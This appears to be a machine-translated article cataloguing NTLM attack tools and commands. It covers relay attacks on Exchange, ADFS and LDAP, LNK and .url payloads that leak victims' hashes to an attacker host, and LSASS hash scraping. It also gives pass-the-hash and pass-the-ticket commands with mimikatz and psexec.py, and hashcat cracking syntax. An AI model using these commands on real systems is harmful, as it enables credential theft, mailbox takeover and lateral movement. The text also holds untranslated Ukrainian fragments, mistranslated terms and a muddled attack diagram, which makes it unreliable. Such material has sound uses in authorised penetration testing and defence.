This article provides a detailed overview of NTLM exploits, including a description of NTLM’s core components, such as the authentication process, the challenge-response mechanism, and hash-based authentication. Also introduced are the various versions of NTLM, including NTLMv1 and NTLMv2, with an emphasis on security improvements that were made in NTLMv2 to address vulnerabilities found in NTLMv1.
NTLM (NT LAN Manager) is a set of security protocols used by Microsoft Windows operating systems for user authentication, integrity, and privacy. It has evolved over time with different versions and is widely used in Windows environments for single sign-on (SSO) and network authentication. ![[server-during-ntlm-authentication.png]] [https://www.ionos.co.uk/digitalguide/server/know-how/ntlm-nt-lan-manager/]
NTLM components:
Authentication process:
NTLM is mainly used for authentication. When a user tries to log on to Windows, NTLM is one of the authentication protocols that can be used.
The process involves exchanging call-response messages to verify the user’s identity.
Call-response mechanism:
NTLM uses a challenge-response mechanism to authenticate users. The server sends a challenge to the client, and the client responds with a hash of the user’s password.
The server compares the received response with the expected one to verify the user’s identity.
Hash-based authentication:
Instead of sending passwords over the network, NTLM relies on the user’s password hash. This adds a layer of security by avoiding the transmission of clear text passwords.
Versions:
There are different versions of NTLM, including NTLMv1 and NTLMv2. NTLMv2 is more secure and includes improvements to address vulnerabilities found in NTLMv1.
+---------------------+ | NTLM Attacks | +---------------------+ | v +-----------------------+ +-----------------------+ | Pass-the-Hash (PtH) | | Pass-the-Ticket | +-----------------------+ +-----------------------+ | | v v +-----------------------+ +-----------------------+ | Credential Sniffing | | Kerberos Ticket Sniff | +-----------------------+ +-----------------------+ | | v v +-----------------------+ +-----------------------+ | Credential Stuffing | | Ticket Renewal Attack | +-----------------------+ +-----------------------+ | | v v +-----------------------+ +-----------------------+ | Brute-Force Attacks | | Ticket Granting | +-----------------------+ | Ticket (TGT) Attacks | | | v v +-----------------------+ +-----------------------+ | Relay Attacks | | Golden Ticket Attack | +-----------------------+ +-----------------------+ | | v v +-----------------------+ +-----------------------+ | SMB Relay | | Silver Ticket Attack | +-----------------------+ +-----------------------+ | | v v +-----------------------+ +-----------------------+ | HTTP Relay | | Overpass-the-Hash | +-----------------------+ +-----------------------+
ID: sinnaj-r / NTLMssp-Extract. Name: NTLMssp-Extract. Attacks: Extracting NetNTLMv2 hashes from NTMLssp-HTTP authentications
Commands and codes:
Installation: Clone the repository. Run the ntlmssp_extract.py file. Requires pyshark pyshark
( https://github.com/KimiNewt/pyshark )and Python 3.
Usage: Execute the Python file. Choose an output format: 0 for (cuda/ocl)Hashcat or 1 for JohnTheRipper. Enter the full path to the capture file. Optionally remove unrelated packages from the record to speed up removal.
ID: ntlmRelayToEWS. Name: ntlmRelayToEWS. Posted by Arno0x0x – @Arno0x0x
Attacks: NTLM relay attacks on Exchange Web Services (EWS). Create SMBListener on port 445 and HTTPListener on port 80. Pass NTLM negotiation to target EWS server
Limitations and improvements:
Tested on Exchange Server 2010 SP2, can work on Exchange 2016. SOAP request templates designed for Exchange 2010 SP2. SOAP request templates can be adapted for new versions using the Microsoft EWS Managed API in trace mode.
Prerequisites:
A proper/clean installation of Impacket is required. Follow Ipacket’s instructions to set up.
Using:
Carry out attacks on behalf of the relayed user (victim). For more information, see the help: ./ntlmRelayToEWS -h. Use the –verbose or -v flag for more debugging information.
Realized attacks:
sendMail: Send an HTML email to a list of recipients.
getFolder: Get all items from a predefined folder (inbox, sent, calendar, tasks).
forwardRule: Create a malicious forwarding rule that forwards all incoming messages for the victim to another email address.
setHomePage: Set the home page of a folder (usually for the Inbox) by specifying a URL.
addDelegate: Set the delegate address for the victim’s primary mailbox.
How to get victim credentials:
Use well-known techniques to trick the victim into sending credentials to ntlmRelayToEWS:
Send an email with a hidden image that points to the ntlmRelayToEWS server.
Create a link file with an icon pointing to ntlmRelayToEWS using a UNC path.
Perform LLMNR, NBNS, or WPAD poisoning to intercept SMB or HTTP traffic from the victim.
- **ID:** ntlmthief - **Title:** NTLMThief - **Repository:** [NTLMThief](https://github.com/4ndr34z/ntlmthief) - **Attacks:** - Extracts NetNTLMv1/v2 hashes from network traffic - Can target protocols like HTTP, SMB, LDAP, IMAP, etc. - **Commands and Codes:** - Refer to the official documentation in the repository for usage and examples. 1. **Word-Thief:** - **ID:** Word-Thief - **Title:** Word-Thief - **Repository:** [Word-Thief](https://github.com/4ndr34z/ntlmthief) - **Attacks:** - Specific attacks related to Microsoft Word documents. - May involve phishing, document-based attacks, or other techniques to extract NTLM hashes. - **Commands and Codes:** - Refer to the official documentation in the repository for usage and examples. 2. **PowerPoint-Thief:** - **ID:** PowerPoint-Thief - **Title:** PowerPoint-Thief - **Repository:** [PowerPoint-Thief](https://github.com/4ndr34z/ntlmthief) - **Attacks:** - Specific attacks related to Microsoft PowerPoint documents. - Similar to Word-Thief, may involve exploiting PowerPoint files for NTLM hash extraction. - **Commands and Codes:** - Refer to the official documentation in the repository for usage and examples. 3. **Excel-Thief:** - **ID:** Excel-Thief - **Title:** Excel-Thief - **Repository:** [Excel-Thief](https://github.com/4ndr34z/ntlmthief) - **Attacks:** - Specific attacks related to Microsoft Excel documents. - Focus on extracting NTLM hashes through Excel-based techniques. - **Commands and Codes:** - Refer to the official documentation in the repository for usage and examples. 4. **Adobe pdf-Thief:** - **ID:** Adobe pdf-Thief - **Title:** Adobe PDF-Thief - **Repository:** [Adobe pdf-Thief](https://github.com/4ndr34z/ntlmthief) - **Attacks:** - Specific attacks related to Adobe PDF documents. - Exploiting PDF files to extract NTLM hashes. - **Commands and Codes:** - Refer to the official documentation in the repository for usage and examples.
ID: NTLMParse. Name: NTLMParse. review: A utility for decoding NTLM messages in base64 encoding. Provides information about the main properties and fields in the message.
Usage: Pass a Base64-encoded message to a program to decode.
example:
`➜ ~ pbpaste | NTLMParse (ntlm.AUTHENTICATE_MESSAGE) { Signature: ([]uint8) (len=8 cap=585) { 00000000 4e 54 4c 4d 53 53 50 00 |NTLMSSP.| }, MessageType: (uint32) 3, LmChallengeResponseFields: (struct { LmChallengeResponseLen uint16; LmChallengeResponseMaxLen uint16; LmChallengeResponseBufferOffset uint32; LmChallengeResponse []uint8 }) { LmChallengeResponseLen: (uint16) 24, LmChallengeResponseMaxLen: (uint16) 24, LmChallengeResponseBufferOffset: (uint32) 160, LmChallengeResponse: ([]uint8) (len=24 cap=425) { 00000000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 00000010 00 00 00 00 00 00 00 00 |........| } }, NtChallengeResponseFields: (struct { NtChallengeResponseLen uint16; NtChallengeResponseMaxLen uint16; NtChallengeResponseBufferOffset uint32; NtChallengeResponse []uint8; NTLMv2Response ntlm.NTLMv2_RESPONSE }) { NtChallengeResponseLen: (uint16) 384, NtChallengeResponseMaxLen: (uint16) 384, NtChallengeResponseBufferOffset: (uint32) 184, NtChallengeResponse: ([]uint8) (len=384 cap=401) { 00000000 30 eb 30 1f ab 4f 37 4d 79 59 28 73 38 51 19 3b |0.0..O7MyY(s8Q.;| 00000010 01 01 00 00 00 00 00 00 89 5f 6d 5c c8 72 d8 01 |........._m\.r..| 00000020 c9 74 65 45 b9 dd f7 35 00 00 00 00 02 00 0e 00 |.teE...5........| 00000030 43 00 4f 00 4e 00 54 00 4f 00 53 00 4f 00 01 00 |C.O.N.T.O.S.O...| 00000040 1e 00 57 00 49 00 4e 00 2d 00 46 00 43 00 47 00 |..W.I.N.-.F.C.G.| } }`
TlRMTVNTUAADAAAAGAAYAKAAAACAAYABuAAAABoAGgBYAAAAEAAQAHIAAAAeAB4AggAAABAAEAA4AgAAFYKI4goAYUoAAAAPqfU7N7/JSXVfIdKvlIvcQkMATwBOAFQATwBTAE8ALgBMAE8AQwBBAEwAQQBDAHIAbwBzAHMAZQByAEQARQBTAEsAVABPAFAALQBOAEkARAA0ADQANQBNAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADDrMB+rTzdNeVkoczhRGTsBAQAAAAAAAIlfbVzIctgByXRlRbnd9zUAAAAAAgAOAEMATwBOAFQATwBTAE8AAQAeAFcASQBOAC0ARgBDAEcAVQA0AEcASABPADAAOAA0AAQAGgBDAE8ATgBUAE8AUwBPAC4ATABPAEMAQQBMAAMAOgBXAEkATgAtAEYAQwBHAFUANABHAEgATwAwADgANAAuAEMATwBOAFQATwBTAE8ALgBMAE8AQwBBAEwABQAaAEMATwBOAFQATwBTAE8ALgBMAE8AQwBBAEwABwAIAIlfbVzIctgBBgAEAAIAAAAIADAAMAAAAAAAAAABAAAAACAAABQaOHb4nG5F2JL1tA5kL+nKQXJSJLDWljeBv+/XlPXpCgAQAON+EDXYnla0bjpwA8gfVEgJAD4ASABUAFQAUAAvAHMAdABzAC4AYwBvAG4AdABvAHMAbwBjAG8AcgBwAG8AcgBhAHQAaQBvAG4ALgBjAG8AbQAAAAAAAAAAAKDXom0m65knt1NeZF1ZxxQ=
ID: ADFSRelay. Name: ADFSRelay. Overview: A Proof of Concept Utility for Investigating NTLM Relay Attacks Targeting the ADFS Service.
Usage: The only required argument is the URL of the ADFS server for an NTLM relay attack. The three optional arguments are -debug to enable debug mode, -port to specify the port the service should listen on (default 8080), and -targetSite to specify the ADFS site to target the relay attack.
example:
➜ ~ ADFSRelay -h Usage of ADFSRelay: -debug Enables debug output -help Show the help menu -port int The port the HTTP listener should listen on (default 8080) -targetSite string The ADFS site to target for the relaying attack (e.g. https://sts.contoso.com) ➜ ~
ID: LNKUp. Name: LNKUp – LNK Data Filtration payload generator. Repository: LNKUp. Overview: A tool for creating LNK payloads that extract data when rendered or run. Usage: Designed specifically for Windows.
Types of payload:
NTLM:
Steals the user’s NTLM hash during rendering. A listener server is required, such as the Metasploit module server. More on leaking NTLM hashes: NTLM hashes are an old Microsoft design flaw
Example of use:
lnkup.py --host localhost --type ntlm --output out.lnk
Environment:
Steals user environment variables. Examples: %PATH%, %USERNAME%, etc. Requires variables to be set using –vars.
Example of use:
lnkup.py --host localhost --type environment --vars PATH USERNAME JAVA_HOME --output out.lnk
Additional parameters:
Use –execute to specify a command to run when the shortcut is double-clicked.
example:
lnkup.py --host localhost --type ntlm --output out.lnk --execute "shutdown /s"
Installation:
Installation requirements using:
pip install -r requirements.txt
Known issues:
This tool will not work on OSX or Linux machines; it is specially designed for Windows. There may be issues with icon caching in some situations. Rebuild the payload if it fails after the first time. Capturing NTLM hashes requires a Metasploit module responder or server. To get the environment variables, start a web server like Apache, Nginx or any other.
The creator of the tool is not responsible for any actions taken with this tool. Contact the author with any questions by opening the issue or via Twitter, @Plazmaz.
ID: Lnkbomb. Name: Lnkbomb – Malicious Quick Access File Downloader. Repository: Lnkbomb.
Overview: Used to download malicious hotkey files to unsecured file shares. Exploits a vulnerability that causes Windows to look for an icon file associated with a shortcut file, directing it to a penetration tester’s machine. Collects NTLMv1 or NTLMv2 hashes (depending on the configuration of the victim host) for later use. The payload file is loaded by the tester directly into the specified unsecured file. Version 2.0 uses the pysmb library, which allows unauthenticated and authenticated payload removal.
Using Python:
Installation:
git clone https://github.com/dievus/lnkbomb.git cd lnkbomb python3 lnkbomb.py -h
Command line flags:
-h, –help: list help options
-t, –target: Specifies the target IP address
-a, –attacker: Specifies the IP address of the tester’s attacking machine
-r, –recover: Used to remove the payload after testing is complete (eg -r payloadname.url)
-w, –windows: Required to configure appropriate ports for Windows shares (new command)
-l, –linux: required to configure appropriate ports for Linux shares (new command)
-n, –netbios: NetBIOS name for Windows target machines must be included (new command)
examples:
`python3 .\lnkbomb.py -t 192.168.1.79 -a 192.168.1.21 -s Shared -u themayor -p Password123! -n dc01 --windows` `python3 .\lnkbomb.py -t 192.168.1.79 -a 192.168.1.21 -s Shared -u themayor -p Password123! -n dc01 --windows -r dicnwdsebl.url`
Use a tool like Responder or smbserver to get the NTLM hash.
`responder -I eth0 -dwFP -v`
or
smbserver.py . . -smb2support
Notes:
Intended for ethical hacking and penetration testing purposes only. Condemns testing targets without permission. The tool uses .url shortcuts instead of .lnk extensions as a deliberate choice. Activation with .url instead of .lnk.
ID: DragonCastle. Name: DragonCastle – AutodialDLL Lateral Movement Technique and SSP for NTLM Hash Scraping.
Description: A PoC that combines the AutodialDLL and SSP lateral movement techniques to flush NTLM hashes from the LSASS process. Downloads a DLL to the target machine that allows you to remotely modify the AutodialDLL registry entry and start/restart the BITS service. Svchosts loads the DLL, sets AutodialDLL to its default value, and performs an RPC request to force LSASS to load the same DLL as a security support provider. Retrieves NTLM hashes and key/IV from LSASS process memory. DLLMain always returns False so processes don’t save it.
Reservation:
Works when RunAsPPL is not enabled. Supports 3DES decryption; easy to add code for AES. Implemented for certain versions of Windows (see the list in the information provided).
Using:
`python3 dragoncastle.py -h`
Command line flags:
-u, –username: Valid username
-p, –password: Valid password (if omitted, prompt if not -no-pass)
-d, –domain: A valid domain name
-hashes: NT/LM hashes (LM hash can be empty)
-no-pass: don’t ask for password (useful for -k)
-k: Use Kerberos authentication. Gets credentials from a ccache file based on target parameters.
-dc-ip: IP address of the domain controller.
-target-ip: The IP address of the target machine.
-local-dll: The location of the DLL (local) to be installed in the target.
-remote-dll: The path used to update the AutodialDLL registry value.
examples:
`python3 dragoncastle.py -u vagrant -p 'vagrant' -d WINTERFELL -target-ip 192.168.56.20 -remote-dll "c:\dump.dll" -local-dll DragonCastle.dll`
ID: requests-ntlm. Name: HTTP NTLM Authentication for Request Library. Description: This package enables HTTP NTLM authentication using the request library.
Using:
HttpNtlmAuth extends requests.AuthBase, making it easier to use:
import requests from requests_ntlm import HttpNtlmAuth requests.get("http://ntlm_protected_site.com", auth=HttpNtlmAuth('domain\\username', 'password')) HttpNtlmAuthможна використовувати з a Sessionдля використання пулу з’єднань для більшої ефективності. import requests from requests_ntlm import HttpNtlmAuth session = requests.Session() session.auth = HttpNtlmAuth('domain\\username', 'password') session.get('http://ntlm_protected_site.com')
Installation:
`pip install requests_ntlm`
Requirements: requests. pyspnego
ID: LDAP Relay Scan. Name: Tool for checking domain controllers for LDAP server security. Description: A tool to test domain controllers for LDAP server security against NTLM authentication relays. It lists LDAP security features, including LDAPS channel binding and LDAP server signing requirements.
Installation:
It is recommended to use Docker or Python virtual environment.
Docker:
Make sure Docker is installed on your machine. Clone the repository and change directory.
git clone https://github.com/zyn3rgy/LdapRelayScan.git && cd LdapRelayScan
Create a Docker container.
docker build -f docker/Dockerfile -t ldaprelayscan .
[Optional] Make sure the script is running properly.
docker run ldaprelayscan -h
Python virtual environment:
Make sure you have Python virtualenv installed on your machine. Clone the repository and change directory.
git clone https://github.com/zyn3rgy/LdapRelayScan.git && cd LdapRelayScan
Create a virtual Python environment for the project.
virtualenv env
Activate the Python virtual environment.
source venv/bin/activate
Establish exact dependencies of requirements versions.
python3 -m pip install -r requirements_exact.txt
[Optional] Make sure the script is running properly.
python3 LdapRelayScan.py -h
The tool has two methods: LDAPS (default) and BOTH. LDAPS only requires the IP address of the domain controller and a link binding check (can be done without authentication). BOTH method requires username and password or NT hash, LDAP signature verification, and LDAP channel binding (authentication required).
Arguments:
-h, –help: Show help message and exit.
-method method: LDAPS or BOTH – LDAPS checks channel binding, BOTH checks LDAP signing and LDAP channel binding [authentication required].
-dc-ip DC_IP: DNS name server on the network. Any DC IPv4 address should work.
-u username: domain username value.
-timeout timeout: MSLDAP client connection timeout.
-p password: domain username value.
-nthash nthash: NT password hash.
examples:
Examples of using a basic/virtual environment:
python3 LdapRelayScan.py -method LDAPS -dc-ip 10.0.0.20 python3 LdapRelayScan.py -method BOTH -dc-ip 10.0.0.20 -u domainuser1 python3 LdapRelayScan.py -method BOTH -dc-ip 10.0.0.20 -u domainuser1 -p badpassword2 python3 LdapRelayScan.py -method BOTH -dc-ip 10.0.0.20 -u domainuser1 -nthash e6ee750a1feb2c7ee50d46819a6e4d25
Docker usage examples:
docker run ldaprelayscan -h docker run ldaprelayscan -dc-ip 10.0.0.20 docker run ldaprelayscan -dc-ip 10.0.0.20 -method BOTH -u domainuser1 -p secretpass docker run -e PROXY_CONFIG='socks5 127.0.0.1 9050' --network=host ldaprelayscan -dc-ip 10.0.0.20 -method BOTH -u domainuser1 -p secretpass
Specifics of error-based enumeration:
[LDAPS] Channel Binding Token Requirements:
On the patched domain controller, there is an option to force an LDAPS channel binding. This is determined in terms of non-authentication by analyzing errors during the LDAP binding process.
Decrypting and monitoring LDAP traffic over SSL/TLS allows you to identify errors when channel binding is applied and when it is not. The specific error, data 80090346 (SEC_E_BAD_BINDINGS), indicates an incorrect SSPI channel binding.
The tool distinguishes between different domain controller settings: LDAP server channel binding token requirement policies, such as Never, When Supported, or Always.
“Never” vs. “When supported” vs. “Always”:
The tool intentionally miscalculates channel binding information when the policy is set to When Supported, producing the same data error 80090346.
[LDAP] Server Signing Requirements:
Domain Controller: The LDAP server signing requirement policy can be set to None, Signing Required, or undefined.
If not specified, no signature is required by default. The tool detects a requirement when a simple connection attempt returns a result code of 8, indicating that stronger authorization is required.
Literature:
Invaluable resources for contextualizing and understanding this tool and how it fits into typical attack scenarios.
Various individuals: @HackAndDo, @_nwodtuhs, @_dirkjan,
ID: lsarelayx. Name: System-wide NTLM relay tool. Description: lsarelayx is a system-wide NTLM relay tool designed to relay incoming NTLM-based authentication to the host on which it runs. It relays any incoming authentication request that includes SMB, HTTP/HTTPS, LDAP/LDAPS, or any other third-party application that implements the Windows authentication API.
features:
Relays system-wide NTLM connections, including SMB, HTTP/HTTPS, LDAP/LDAPS, or any other third-party application that implements the Windows authentication API.
Drops incoming Kerberos authentication requests to NTLM where possible, forcing clients to fall back to NTLM.
Performs an LDAP query for the relayed user to retrieve group membership information and generates the correct authentication token for the original query.
Resets NetNTLM messages for offline hacking.
Supports passive mode, which does not relay, but only resets captured NetNTLM hashes (no Kerberos fallback in this mode).
How it works:
lsarelayx consists of three parts: liblsarelayx.dll (a fake LSA authentication provider), lsarelayx.exe (a user-mode console program as a management interface), and a new ntlmrelayx server module called RAW.
liblsarelayx.dll:
The authentication provider LSA loaded by lsarelayx intercepts NTLM and Negotiate packets, redirects authentication requests to lsarelayx over a local named relay channel, and resets NetNTLM hashes.
lsarelayx.exe:
The main console application loads a specialized LSA authentication provider, listens for incoming NTLM and Negotiate tokens, relays to the RAW ntlmrelayx server module, and performs LDAP queries to capture group information. RAW ntlmrelayx module: A new ntlmrelayx server module called RAW accepts raw NTLM messages directly from lsarelayx.
Using:
Active mode: Start the ntlmrelayx RAW server module.
python examples\ntlmrelayx.py -smb2support --no-wcf-server --no-smb-server --no-http-server "-t" smb://dc.victim.lan
Run lsarelayx in active relay mode.
lsarelayx.exe --host 192.168.1.1
Passive mode: Run lsarelayx in passive mode.
lsarelayx.exe
Reservation:
liblsarelayx.dll cannot be unloaded after loading in lsass.exe due to LSA plugins limitations.
An LSA plugin that is not a real plugin may be implemented as a reflective loader inside the plugin in the future.
Development was performed on Windows 10 and Server 2016. Testing on other versions may require manual configuration.
!!WARNING!!: liblsarelayx.dll will be loaded into the critical lsass.exe process. Errors can cause lsass.exe to crash, causing the host to reboot after 60 seconds.
Get Hash: Collect or extract hashed credentials (NTLM or LM hash) from a compromised system.
Pass Hash: Use the resulting hash to authenticate to other systems or services without needing an actual plaintext password.
Lateral Movement: Move laterally in the network, increasing your privileges and gaining access to additional systems.
mimikatz.exe "sekurlsa::pth /user:<username> /domain:<domain> /ntlm:<hash>"
mpacket’s psexec.py: Execute commands on a remote system using a captured hash.
psexec.py <target> -hashes :<hash>
Hash transfer tools: Various tools like Windows Credential Editor (WCE) or Metasploit’s PsExec module.
wce.exe -w
Withdrawal of tickets. Obtain a Kerberos Ticket Granting Ticket (TGT) or Ticket-Granting Service (TGS) from a compromised system.
Pass a ticket: Use a received ticket to authenticate to other systems or services without requiring public user credentials.
Lateral Movement: Move laterally in the network, increasing your privileges and gaining access to additional systems.
Mimikatz: A powerful post-exploitation tool.
mimikatz.exe "kerberos::ptt <base64_ticket>"
Psexec.py Impacket: Execute commands on a remote system using a captured ticket.
psexec.py <target> -k -ticket <base64_ticket>
KRBTTGT Abuse: Abusing the Kerberos TGT for lateral movement.
kirbikator krbtgt/<domain>@<domain> -t <base64_tgt>
Initial credential theft. Obtain valid credentials using various methods such as phishing, password spraying, or credential injection.
Hash Transfer (PtH): Use received credentials to extract a hash value (such as NTLM or Kerberos) from a compromised system.
Overpass-the-Hash: Use extracted hash values to access additional systems or resources on the network without the need for exposed credentials.
Lateral Traversal: Use compromised credentials to laterally traverse the network, elevate privileges, and gain access to sensitive information.
Pass-the-Hash (PtH) with Mimikatz: Use Mimikatz to perform PtH with the hash removed.
mimikatz.exe "sekurlsa::pth /user:<username> /ntlm:<NTLM_hash> /domain:<domain> /run:<command>"
Key Transfer (PtK) with Impacket: Use Impacket’s psexec module to perform PtK with an NTLM hash.
psexec.py <target_IP> -hashes :<NTLM_hash> -u <username> -p <password>
Overpass-the-Hash with CrackMapExec (CME): Use CME for lateral traversal using compromised credentials.
cme smb <target_IP> -u <username> -p :<NTLM_hash>
Target Identity: Define a target web application that uses NTLM authentication for user access.
NTLM Credential Harvesting: Intercepting NTLM authentication traffic between the client and the target web application.
HTTP Relay: Relay intercepted NTLM authentication to another server or application.
Successful authentication: Achieve successful authentication of the target web application using NTLM relay credentials.
Responder for NTLM Relay: Use Responder to perform NTLM Relay attacks. bash responder -I <interface> -w -r -v
Ntlmrelayx for HTTP relay: Use ntlmrelayx from the Impacket toolkit to relay NTLM authentication.
ntlmrelayx.py -t <target_url> --no-http-server
Application-Specific HTTPD-NTLM-Relay: Use HTTPD-NTLM-Relay for application-specific purposes.
./httpd-ntlm-relay -u http://<target_url> -l <local_IP> -r <remote_IP>
Hash Identification: Obtain target password hashes from a compromised system or database dump.
Hashcat Configuration: Prepare Hashcat for brute force attacks by choosing the appropriate hashing mode and attack type.
Create a wordlist: Create or select a wordlist that contains potential passwords for the target hashes.
Brute-Forcing: Run Hashcat to systematically try password combinations against target hashes.
Password Recovery: Identify successful password matches from Hashcat results.
MD5:
-m 0
SHA-1:
-m 100
SHA-256:
-m 1400
NTLM:
-m 1000
Brute force attack:
Прямий (інкрементальний):
-a 3
Комбінація:
-a 1
Маска Атака:
-a 3 --increment -1 ?u?l?d
Word list attack:
Стандартний список слів:
hashcat -m 1000 -a 0 hashes.txt /path/to/wordlist.txt
Incremental brute force:
Тільки числові:
hashcat -m 1000 -a 3 hashes.txt -1 ?d
буквено-цифровий:
hashcat -m 1000 -a 3 hashes.txt -1 ?l?d
Mask Attack:
Укажіть набір символів:
hashcat -m 1000 -a 3 hashes.txt -1 ?l?d ?1?1?1?1